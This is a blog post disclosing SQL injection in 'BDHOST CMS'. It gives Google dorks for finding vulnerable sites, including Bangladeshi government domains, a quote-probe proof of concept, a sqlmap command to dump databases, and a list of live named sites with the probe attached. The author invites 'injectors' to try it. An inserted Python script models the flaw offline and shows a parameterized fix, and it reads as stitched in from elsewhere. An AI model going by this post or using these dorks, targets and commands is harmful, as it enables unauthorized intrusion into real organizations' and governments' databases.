Tuesday, June 23, 2015

BDHOST CMS - SQL Injection Vulnerability

Google Dorks :-

    "Developed by BDHOST"
    "Developed by BDHOST" inurl:"php?id="
    "Developed by BDHOST" +inurl:/.php?id=
    "Developed by BDHOST" inurl:"php?id=" site:gov.bd

POC :-  http://127.0.0.1/index.php?id=[SQL]'
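The PoC above is the classic quote probe: append `'` to the `id` parameter and see whether the page throws a database error. As an added example (not code from the original post, and not the BDHOST CMS source, which the page does not show), the script below models that pattern offline with Python's sqlite3: a lookup that concatenates `id` straight into the query, the parameterized version that fixes it, a helper that turns a URL into the `%27` probe form used in the demo list, and a checker that flags MySQL-style error text in a response body. The table name `news`, the column names, the unquoted numeric `WHERE id = ...` shape and the error-string list are all assumptions made for the example.

```python
"""
Added example: a minimal model of the `index.php?id=` injection behind the PoC.
Runs offline; the schema and query shape are assumptions, not the CMS's code.
"""
import re
import sqlite3
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Error fragments a quote probe typically surfaces on a PHP/MySQL site.
# Constructed list for the example; extend it for other back-ends.
SQL_ERROR_PATTERNS = [
    r"You have an error in your SQL syntax",
    r"mysql_(?:fetch_array|fetch_assoc|num_rows|query)\(\)",
    r"supplied argument is not a valid MySQL result",
    r"mysqli_sql_exception",
]


def probe_url(url: str, param: str = "id", suffix: str = "'") -> str:
    """Append `suffix` to one query parameter, as the PoC `id=[SQL]'` does.

    urlencode percent-encodes the quote, giving the `id=11%27` form seen
    in the demo URLs.
    """
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    if param not in dict(query):
        raise ValueError(f"{param!r} not found in query string")
    query = [(k, v + suffix if k == param else v) for k, v in query]
    return urlunsplit(parts._replace(query=urlencode(query)))


def looks_injectable(body: str) -> bool:
    """True if a response to the quote probe carries a SQL error message."""
    return any(re.search(p, body, re.IGNORECASE) for p in SQL_ERROR_PATTERNS)


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str):
    """Assumed vulnerable pattern: the raw parameter is concatenated into
    the statement, so `11'` is a syntax error and `11 OR 1=1` is a dump."""
    sql = f"SELECT title FROM news WHERE id = {user_id}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str):
    """Hardened form: reject anything that is not a number, then bind it."""
    if not user_id.isdigit():
        return []
    return conn.execute(
        "SELECT title FROM news WHERE id = ?", (int(user_id),)
    ).fetchall()


def demo() -> dict:
    """Run both versions against a constructed two-row table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)", [(11, "Budget notice"), (12, "Tender")]
    )
    results = {}
    # A normal request behaves identically in both versions.
    results["normal"] = (
        vulnerable_lookup(conn, "11") == safe_lookup(conn, "11") == [("Budget notice",)]
    )
    # The PoC: the trailing quote breaks the concatenated statement...
    try:
        vulnerable_lookup(conn, "11'")
        results["vuln_errors"] = False
    except sqlite3.OperationalError:
        results["vuln_errors"] = True
    # ...while the parameterized version simply refuses the value.
    results["safe_rejects"] = safe_lookup(conn, "11'") == []
    # A boolean payload pulls every row from the vulnerable version only.
    results["vuln_dumps_all"] = len(vulnerable_lookup(conn, "11 OR 1=1")) == 2
    results["safe_no_dump"] = safe_lookup(conn, "11 OR 1=1") == []
    return results


if __name__ == "__main__":
    print(probe_url("http://127.0.0.1/index.php?id=11"))
    print(demo())
```

The error that `vulnerable_lookup` raises is exactly what the quote probe is hoping to see rendered in the HTML; `looks_injectable` is the offline half of that check, meant to be fed the body of a real response. The fix is not in the detection but in `safe_lookup`: type-check the parameter and bind it, so no attacker-controlled text ever reaches the SQL parser as syntax.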
 
I found this one not long ago. As soon as I saw it was BDHost CMS I got interested.. why? You all know the country called BD.. when I'm bored I only ever scan bd sites..
Now I really like these little techniques... bd sites mostly look like big ones.. Injectors will like this one...

One thing you should know though... the web security level is high.. for noob injectors it probably won't go smoothly... as for tool users.. something like Havij probably won't work.. I think it'll take something like SQLMap to get anywhere...



SQLMap (replace [SQL] with the real id value from the target page; --dbs lists the databases once the parameter is confirmed injectable)

++++++++++++++++++++++++++

python sqlmap.py --url "http://127.0.0.1/index.php?id=[SQL]" --dbs

++++++++++++++++++++++++++
Give it a try..

DEMO :-

    http://www.bdp.gov.bd/index.php?id=11%27
    http://www.ansarvdpbank.gov.bd/index.php?id=65%27
    http://fltc.gov.bd/index.php?id=54%27
    http://rgamc.gov.bd/index.php?id=184%27
    http://www.mahimatours.com/index.php?id=46%27
    http://www.fair-bond.com/index.php?id=102%27
    http://intragroupbd.com/index.php?id=58%27
    http://www.apartmentpropertiesbd.com/news.php?id=6%27
    http://www.themeengineersltd.com/index.php?id=42%27
    http://www.cdpl-bd.com/index3.php?id=136%27
    http://192.99.33.95/~distribu/index.php?id=90%27
